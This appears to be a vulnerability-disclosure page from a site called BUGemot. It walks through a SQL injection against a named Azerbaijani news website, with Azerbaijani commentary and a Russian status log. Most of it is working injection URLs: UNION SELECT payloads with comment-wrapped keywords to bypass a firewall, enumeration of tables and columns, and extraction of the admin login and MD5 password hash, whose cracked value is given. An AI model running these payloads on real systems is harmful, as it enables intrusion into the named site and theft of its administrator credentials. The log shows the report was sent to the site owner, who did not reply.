Подробная информация
http://www.aztime.az/?id=3&bid=8&mid=676' # Sql Vunl
Column Sayi 13, Datalar gelen Columnlar 3,5,8
http://www.aztime.az/?id=3'&bid=8&mid=-676' UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+-' # bele olanda ilk olarag table_name de problem yaranacag cunki latin1 convert etmek lazimdir onnan sonra 406 Not Accetpt xetasi gelecey firewalli bypass etmek ucunse
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(table_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-' # ekrana Admin table_name gelmelidir
Admin Table-den columnlari cekmek cun
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ # lakin ekrana sadece ID column_name-si gelecey o biri column_name ler gelmiyecey
Login ve password olan column_name-ri tapmap ucun Like %log%(lakin %log% bu hisseni hex-lemek lazimdir ) ve Like %pas%(hemcinin %pas% buranida )
Emrinden istifade edib tapa bilerik
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Loginler olan column_name "login"
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Passwordlar olan column_name ise pass
Indi ise columlardan dalari cekek
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(login USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' # Login admin
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(pass USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' Password ise md5 olunmush halda: 202cb962ac59075b964b07152d234b70 (hash ise 123-dur)
Записи
-
21 Октябрь 2016, 13:52
Статус уязвимости
Нет ответа от источника -
04 Октябрь 2016, 10:04
Уязвимости присвоен балл
За перевод уязвимости дано переводчику 8 баллов -
04 Октябрь 2016, 10:04
Уязвимости присвоен балл
За перевод уязвимости дано автору 0 баллов -
22 Август 2016, 10:11
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
21 Июнь 2016, 13:47
Уязвимости присвоен балл
Модератор присвоил 8 баллов из 10-и на уязвимости -
21 Июнь 2016, 13:44
Статус уязвимости
Подтверждено со стороны модератора -
20 Июнь 2016, 03:50
Добавлена уязвимость
Добавлена уязвимость на BUGemot